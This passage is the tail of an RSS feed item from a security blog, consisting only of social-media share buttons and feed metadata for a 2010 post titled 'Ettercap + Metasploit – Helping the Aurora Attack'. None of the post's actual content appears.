href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;linkname=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F01%2F28%2Fettercap-metasploit-helping-the-aurora-attack%2F&amp;title=Ettercap%20%2B%20Metasploit%20%E2%80%93%20Helping%20the%20Aurora%20Attack" id="wpa2a_20"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/01/28/ettercap-metasploit-helping-the-aurora-attack/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>

